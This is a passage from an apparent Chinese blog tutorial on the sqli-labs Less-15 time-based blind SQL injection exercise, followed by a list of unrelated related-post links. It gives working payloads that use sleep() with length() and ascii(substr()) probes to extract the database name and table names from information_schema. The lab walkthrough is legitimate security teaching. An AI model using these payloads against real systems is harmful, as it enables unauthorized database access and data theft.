SQL 时间盲注 (injection 第十五关)

简介

SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。

SQL注入的一个简要流程:

1、打开目标靶场

2、选择less - 15

3、确定网站可以注入的参数

本关可以直接在输入框中搜索

4、判断闭合方式

本关为 1' #

5、确定字段列数

使用 order by

若页面正常,则存在1列,输入 1' and if(length(database())>7,sleep(5),1) #

发现有时间延迟,则数据库长度大于7

最终确定数据库长度为8

6、确定数据名称

可以输入以下代码

1' and if(ascii(substr(database(),1,1))>114,sleep(5),1) #

以此可以确定第一个字符的ASCII码值为115,字母为s

7、查询数据库中第一张表

查询第一张表的第一个字符

1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(5),1) #

有延时则大于100

最终可以确定第一位字符ascii码为101,确定为字母e

按照此法依次可以得出最终自己想要的数据内容!!!

安全

网络是把双刃剑,安全使用是关键

​​​​​​​

相关推荐
码兄科技9 小时前
Java AI智能体开发实战:从零构建智能对话系统指南
java·开发语言·人工智能
xixingzhe29 小时前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
Drone_xjw10 小时前
从 GDB 到 CDB:C/C++ 程序调试的两把“手术刀”
c语言·开发语言·c++
中科岩创10 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
SL-staff10 小时前
智慧园区2000+设备统一管理:JVS-IoT如何降低运维成本40%
java·开发语言·物联网·智慧园区·设备管理·运维优化·jvs-iot
项目经理老王11 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
云和恩墨12 小时前
数据库一体机简史:从ODA到zData X,命名之中的玄机
数据库·vr
2zcode12 小时前
基于MATLAB图像处理的饮料瓶灌装液位检测系统设计与实现
开发语言·图像处理·matlab
数据库小学妹13 小时前
KES是什么?国产数据库技术架构、核心能力与选型实战解析
数据库·经验分享·架构·国产数据库·数据库选型·信创数据库
必须得开心呀13 小时前
QT解决中文乱码问题
开发语言·qt